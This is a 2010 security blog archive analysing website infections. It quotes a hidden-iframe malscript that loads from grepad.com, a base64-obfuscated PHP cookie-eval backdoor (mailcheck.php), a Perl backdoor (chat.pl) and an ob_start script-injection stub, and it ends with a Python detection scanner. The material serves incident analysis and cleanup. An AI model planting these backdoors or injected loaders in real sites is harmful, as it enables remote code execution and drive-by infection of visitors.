Archive for May 2010
Treasury .gov websites hacked
It was announced by AVG that the websites bep.gov (Bureau of Engraving and Printing), bep.treas.gov and moneyfactory.gov had been injected with a malscript:
<SCR IPT (space added)> function addCookie(name, value, hours) { var date = new Date(); date.setTime(date.getTime()+(hours*3600000)); var expires = "; expires="+date.toGMTString(); document.cookie = name+"="+value+expires+"; "; }
document.write('<iframe frameborder="0" onload=\' if (!this.src){ this.src="http://grepad.com/in.cgi?3"; this.height=0; this.width=0;} \'></iframe>'); addCookie("cook", "1", 24); </SCR IPT (space added)>
According to this webpage: http://news.softpedia.com/news/Department-of-the-Treasury-Website-Rigged-to-Exploit-Visitors-141277.shtml "Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious grepad.com domain in both attacks."
However, it could also be that someone with FTP access to the website had a virus. Such a virus steals FTP login credentials and sends them to a server, which then infects the websites those credentials give it legitimate access to. I see no mention of that possibility. Given that this code was injected after the closing html tag, I doubt very seriously that it's a SQL injection; possible, but highly unlikely.
Could it have been part of the larger compromise at the hosting provider? Possibly, although the last I heard and read, they had cleaned that all up. I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.
Could it be that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the "stuff" hits the fan. I have applauded them before and I do so now as well.
Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?
Please leave your comments below…
Thank you.
Attack of mailcheck.php and chat.pl
This attack isn't anything new; it was used on a number of Italian sites in March 2010, but we've been seeing more of it infecting websites recently, so I thought I'd elaborate.
Quite often, when scanning or cleaning infected websites, where we see the mailcheck.php file we also see the chat.pl file, but that isn't cast in stone. However, we have not seen chat.pl by itself. In other words, mailcheck.php can appear by itself, but chat.pl does not, at least from what we've seen.
The mailcheck.php file usually contains this code:
<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9')); echo "checking email...";?>
Which deobfuscates to:
if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}
The chat.pl file is programmed in Perl and looks like:
#!/usr/bin/perl
use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ==");
$P = "Lf'njItkk";
$WinNT = 0;
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 120;
$ShowDynamicOutput = 1;
As you can see, this code also relies on base64 decoding even though it's written in Perl. Same strategy, different programming language.
Along with the mailcheck.php and/or chat.pl infection, we've seen a number of .php and sometimes even .html files with PHP code inserted at the top of the file that looks like:
<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t()…
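As an added example (not code from either post), a small Python scanner that flags the indicators both posts describe when run over a copy of a web root: the mailcheck.php/chat.pl file names, eval(base64_decode()) in PHP or eval MIME::Base64::decode() in Perl with the payload statically decoded so the analyst can see the cookie trigger, the ob_start() callback that appends a script to every page it buffers, and script injected after the closing html tag as in the Treasury post. The sample files are constructed, their base64 blobs are re-encoded from the decoded lines quoted above, and placeholder.invalid stands in for the real iframe host.

```python
import base64
import re

# Constructed sample web root modelled on the indicators in these two posts; the base64
# blobs are re-encoded from the decoded lines quoted above and the iframe URL is a placeholder.
PHP_PAYLOAD = base64.b64encode(
    b'if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}').decode()
PERL_PAYLOAD = base64.b64encode(b'$c = $ENV{"HTTP_COOKIE"};@c = split /;/, $c;').decode()
SAMPLE_FILES = {
    "mailcheck.php": f"<?php eval(base64_decode('{PHP_PAYLOAD}')); echo \"checking email...\";?>",
    "chat.pl": f'#!/usr/bin/perl\nuse MIME::Base64 ();eval MIME::Base64::decode("{PERL_PAYLOAD}");',
    "index.php": "<?php ob_start('security_update'); function security_update($buffer)"
                 "{return $buffer.'<script>function t(){}</script>';} ?>\n<html></html>",
    "about.html": "<html><body>ok</body></html>\n<script>document.write('<iframe "
                  "src=\"http://placeholder.invalid/in.cgi\" height=0></iframe>');</script>",
    "clean.php": "<?php echo 'hello'; ?>",
}

# eval(base64_decode('...')) in PHP, or eval MIME::Base64::decode("...") in Perl
EVAL_B64 = re.compile(
    r"eval\s*\(?\s*(?:base64_decode|MIME::Base64::decode)\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
# an ob_start() callback whose body appends a <script> tag to every page it buffers
OB_INJECT = re.compile(
    r"ob_start\s*\(\s*['\"](\w+)['\"]\s*\).*?function\s+\1\s*\(.*?<script", re.I | re.S)
# script or iframe placed after the document has already been closed
AFTER_HTML = re.compile(r"</html>\s*<(?:script|iframe)", re.I)
SUSPECT_NAMES = {"mailcheck.php", "chat.pl"}

def decode_blob(blob):
    """Statically decode a base64 literal; Perl sources may carry literal '\\n' sequences."""
    try:
        return base64.b64decode(re.sub(r"\\n|\s", "", blob)).decode("utf-8", "replace")
    except ValueError:
        return "<undecodable>"

def scan_file(name, text):
    """Return (indicator, detail) tuples for one file; an empty list means nothing matched."""
    hits = []
    if name.lower() in SUSPECT_NAMES:
        hits.append(("suspect_filename", name))
    for m in EVAL_B64.finditer(text):
        decoded = decode_blob(m.group(1))  # decoded for the analyst, never executed
        hits.append(("eval_base64", decoded))
        if "$_COOKIE" in decoded or "HTTP_COOKIE" in decoded:
            hits.append(("cookie_triggered_backdoor", decoded))
    if m := OB_INJECT.search(text):
        hits.append(("ob_start_script_injection", m.group(1)))
    if m := AFTER_HTML.search(text):
        hits.append(("script_after_closing_html", m.group(0)))
    return hits
```

Running scan_file over every file in SAMPLE_FILES reports the four infected files and nothing for clean.php; the regexes are deliberately loose and meant to surface files for manual review, not to replace a full cleanup.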